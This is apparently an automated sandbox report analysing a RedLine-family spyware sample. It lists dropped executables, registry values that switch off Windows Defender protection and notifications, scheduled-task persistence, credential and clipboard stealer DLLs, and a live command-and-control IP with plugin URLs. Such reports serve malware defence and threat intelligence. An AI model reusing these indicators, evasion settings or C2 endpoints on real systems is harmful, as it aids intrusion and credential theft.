                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D18A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_011D18A3
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: GetLocaleInfoA,2_2_00417A20
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: GetLocaleInfoA,2_2_005C7C87
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011E7AFC cpuid 15_2_011E7AFC
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_011D7155
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011F3C76 _free,_free,_free,GetTimeZoneInformation,_free,15_2_011F3C76
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_023996A8 GetUserNameA,2_2_023996A8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_011D2BFB

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: 2.2.amMl.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.amMl.exe.5b0e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.amMl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.amMl.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000003.343232585.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 31.2.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.0.xriv.exe.11d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 35.0.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.0.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.2.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.file.exe.4bb4820.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 35.2.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.file.exe.4bb4820.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.0.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.xriv.exe.11d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.0.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000010.00000000.402656135.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000002.519184660.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000000.518847759.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000002.646081844.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000000.645377200.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.410254197.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.785140671.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.409483823.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000000.400766948.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000000.773987737.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000002.774229388.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.261384983.0000000004B55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.785793369.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 4184, type: MEMORYSTR
                            Source: Yara matchFile source: 28.2.rundll32.exe.6f690000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dll, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: 2.2.amMl.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.amMl.exe.5b0e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.amMl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.amMl.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000003.343232585.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts3
                            Native API
                            1
                            Windows Service
                            2
                            Bypass User Access Control
                            21
                            Disable or Modify Tools
                            1
                            Input Capture
                            2
                            System Time Discovery
                            Remote Services1
                            Archive Collected Data
                            Exfiltration Over Other Network Medium14
                            Ingress Tool Transfer
                            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                            System Shutdown/Reboot
                            Default Accounts2
                            Command and Scripting Interpreter
                            1
                            Scheduled Task/Job
                            1
                            Access Token Manipulation
                            1
                            Deobfuscate/Decode Files or Information
                            LSASS Memory1
                            Account Discovery
                            Remote Desktop Protocol1
                            Input Capture
                            Exfiltration Over Bluetooth2
                            Encrypted Channel
                            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts1
                            Scheduled Task/Job
                            1
                            Registry Run Keys / Startup Folder
                            1
                            Windows Service
                            2
                            Obfuscated Files or Information
                            Security Account Manager2
                            File and Directory Discovery
                            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                            Non-Application Layer Protocol
                            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts1
                            Service Execution
                            1
                            Services File Permissions Weakness
                            111
                            Process Injection
                            2
                            Software Packing
                            NTDS36
                            System Information Discovery
                            Distributed Component Object ModelInput CaptureScheduled Transfer113
                            Application Layer Protocol
                            SIM Card SwapCarrier Billing Fraud
                            Cloud AccountsCronNetwork Logon Script1
                            Scheduled Task/Job
                            1
                            Timestomp
                            LSA Secrets31
                            Security Software Discovery
                            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable MediaLaunchdRc.common1
                            Registry Run Keys / Startup Folder
                            2
                            Bypass User Access Control
                            Cached Domain Credentials21
                            Virtualization/Sandbox Evasion
                            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup Items1
                            Services File Permissions Weakness
                            1
                            Masquerading
                            DCSync2
                            Process Discovery
                            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                            Virtualization/Sandbox Evasion
                            Proc Filesystem1
                            System Owner/User Discovery
                            Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Access Token Manipulation
                            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)111
                            Process Injection
                            Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                            Services File Permissions Weakness
                            Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                            Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                            Rundll32
                            KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 802001 Sample: file.exe Startdate: 08/02/2023 Architecture: WINDOWS Score: 100 65 Snort IDS alert for network traffic 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for URL or domain 2->69 71 7 other signatures 2->71 9 file.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 4 other processes 2->16 process3 file4 55 C:\Users\user\AppData\Local\Temp\...\xriv.exe, PE32 9->55 dropped 57 C:\Users\user\AppData\Local\Temp\...\bmMg.exe, PE32 9->57 dropped 18 xriv.exe 3 9->18         started        22 bmMg.exe 1 4 9->22         started        process5 file6 49 C:\Users\user\AppData\Local\...\mnolyk.exe, PE32 18->49 dropped 73 Machine Learning detection for dropped file 18->73 75 Contains functionality to inject code into remote processes 18->75 24 mnolyk.exe 18 18->24         started        51 C:\Users\user\AppData\Local\Temp\...\nika.exe, PE32 22->51 dropped 53 C:\Users\user\AppData\Local\Temp\...\amMl.exe, PE32 22->53 dropped 29 amMl.exe 9 1 22->29         started        31 nika.exe 1 1 22->31         started        signatures7 process8 dnsIp9 63 62.204.41.4, 49701, 49702, 49703 TNNET-ASTNNetOyMainnetworkFI United Kingdom 24->63 59 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 24->59 dropped 61 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 24->61 dropped 77 Creates an undocumented autostart registry key 24->77 79 Machine Learning detection for dropped file 24->79 81 Uses schtasks.exe or at.exe to add and modify task schedules 24->81 33 cmd.exe 1 24->33         started        35 schtasks.exe 1 24->35         started        37 rundll32.exe 24->37         started        83 Detected unpacking (changes PE section rights) 29->83 85 Detected unpacking (overwrites its own PE header) 29->85 87 Disable Windows Defender notifications (registry) 29->87 89 Disable Windows Defender real time protection (registry) 29->89 file10 signatures11 process12 process13 39 conhost.exe 33->39         started        41 cmd.exe 1 33->41         started        43 cmd.exe 1 33->43         started        47 4 other processes 33->47 45 conhost.exe 35->45         started       

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            file.exe67%ReversingLabsWin32.Spyware.RedLine
                            file.exe100%Joe Sandbox ML
                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe100%Joe Sandbox ML
                            No Antivirus matches
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dll0%URL Reputationsafe
                            http://62.204.41.4/Gol478Ns/index.phpm00%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dllG0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.php342a20%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpyux0%Avira URL Cloudsafe
                            http://62.204.41.4/Golol478Ns/index.php0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dll100%URL Reputationmalware
                            http://62.204.41.4/Gol478Ns/index.phptch0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpc0%Avira URL Cloudsafe
                            62.204.41.4/Gol478Ns/index.php100%URL Reputationmalware
                            http://62.204.41.4/Gol478Ns/index.phpIo0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.php100%URL Reputationmalware
                            http://62.204.41.4/Gol478Ns/index.php.0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpe0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpFo0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exel0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exe0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpt0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.php20%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpL0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpe5342a20%Avira URL Cloudsafe
                            No contacted domains info
                            NameMaliciousAntivirus DetectionReputation
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dlltrue
                            • URL Reputation: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dlltrue
                            • URL Reputation: malware
                            unknown
                            62.204.41.4/Gol478Ns/index.phptrue
                            • URL Reputation: malware
                            low
                            http://62.204.41.4/Gol478Ns/index.phptrue
                            • URL Reputation: malware
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dllGmnolyk.exe, 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpm0mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Golol478Ns/index.phpmnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.php342a2mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpyuxmnolyk.exe, 00000010.00000002.785793369.00000000010FA000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phptchmnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpIomnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpcmnolyk.exe, 00000010.00000003.741852374.0000000001197000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpemnolyk.exe, 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpLmnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.php.mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exelmnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phptmnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpFomnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpe5342a2mnolyk.exe, 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exemnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.php2mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            62.204.41.4
                            unknownUnited Kingdom
                            30798TNNET-ASTNNetOyMainnetworkFItrue
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:802001
                            Start date and time:2023-02-08 21:27:22 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 14m 25s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:37
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@37/14@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 41.2% (good quality ratio 39.5%)
                            • Quality average: 85%
                            • Quality standard deviation: 24.3%
                            HCA Information:
                            • Successful, ratio: 90%
                            • Number of executed functions: 101
                            • Number of non-executed functions: 134
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            21:31:08API Interceptor1989x Sleep call for process: mnolyk.exe modified
                            21:31:10Task SchedulerRun new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            62.204.41.4file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            TNNET-ASTNNetOyMainnetworkFIfile.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            klXwCWqTsX.exeGet hashmaliciousBrowse
                            • 62.204.41.5
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dllfile.exeGet hashmaliciousBrowse
                              file.exeGet hashmaliciousBrowse
                                file.exeGet hashmaliciousBrowse
                                  file.exeGet hashmaliciousBrowse
                                    file.exeGet hashmaliciousBrowse
                                      file.exeGet hashmaliciousBrowse
                                        file.exeGet hashmaliciousBrowse
                                          file.exeGet hashmaliciousBrowse
                                            file.exeGet hashmaliciousBrowse
                                              file.exeGet hashmaliciousBrowse
                                                file.exeGet hashmaliciousBrowse
                                                  file.exeGet hashmaliciousBrowse
                                                    file.exeGet hashmaliciousBrowse
                                                      file.exeGet hashmaliciousBrowse
                                                        file.exeGet hashmaliciousBrowse
                                                          file.exeGet hashmaliciousBrowse
                                                            file.exeGet hashmaliciousBrowse
                                                              file.exeGet hashmaliciousBrowse
                                                                file.exeGet hashmaliciousBrowse
                                                                  file.exeGet hashmaliciousBrowse
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):226
                                                                    Entropy (8bit):5.354940450065058
                                                                    Encrypted:false
                                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                    MD5:B10E37251C5B495643F331DB2EEC3394
                                                                    SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                    SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                    SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):321
                                                                    Entropy (8bit):5.355221377978991
                                                                    Encrypted:false
